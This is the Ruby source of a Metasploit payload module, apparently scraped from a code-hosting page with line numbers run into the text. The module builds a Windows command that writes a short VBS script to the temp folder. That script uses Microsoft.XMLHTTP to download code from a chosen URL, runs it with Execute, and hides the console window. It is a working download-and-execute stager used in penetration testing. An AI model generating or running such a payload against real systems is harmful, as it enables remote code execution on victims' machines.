Path: blob/master/modules/payloads/singles/cmd/windows/download_eval_vbs.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = :dynamic78include Msf::Payload::Single9include Msf::Sessions::CommandShellOptions1011def initialize(info = {})12super(13merge_info(14info,15'Name' => 'Windows Executable Download and Evaluate VBS',16'Description' => %q{17Downloads a file from an HTTP(S) URL and executes it as a vbs script.18Use it to stage a vbs encoded payload from a short command line.19},20'Author' => 'scriptjunkie',21'License' => BSD_LICENSE,22'Platform' => 'win',23'Arch' => ARCH_CMD,24'Handler' => Msf::Handler::None,25'Session' => Msf::Sessions::CommandShell,26'PayloadType' => 'cmd',27'RequiredCmd' => 'wscript',28'Payload' => {29'Offsets' => {},30'Payload' => ''31}32)33)3435register_options(36[37OptString.new('URL', [ true, 'The pre-encoded URL to the script' ]),38OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),39OptBool.new('INCLUDEWSCRIPT', [ true, 'Include the wscript command', false ]),40OptBool.new('DELETE', [ true, 'Delete created .vbs after download', false ])41]42)43end4445def generate(_opts = {})46return super + command_string47end4849def command_string50# Keep variable names short.51vbsname = Rex::Text.rand_text_alpha(1..2)52xmlhttpvar = Rex::Text.rand_text_alpha(1..2)5354command = ''55command << 'cmd.exe /q /c ' if datastore['INCLUDECMD']56command << "cd %tmp%&echo Set #{xmlhttpvar}=CreateObject(\"Microsoft.XMLHTTP\"):" \57"#{xmlhttpvar}.Open \"GET\",\"#{datastore['URL']}\",False:" \58"#{xmlhttpvar}.Send:" \59"Execute #{xmlhttpvar}.responseText"60command << ":CreateObject(\"Scripting.FileSystemObject\").DeleteFile \"#{vbsname}.vbs\"" if datastore['DELETE']6162# "start #{vbsname}.vbs" instead of just "#{vbsname}.vbs" so that the console window63# disappears quickly before the wscript libraries load and the file downloads64command << " >#{vbsname}.vbs" \65'&start '66command << 'wscript ' if datastore['INCLUDEWSCRIPT']67command << "#{vbsname}.vbs"68end69end707172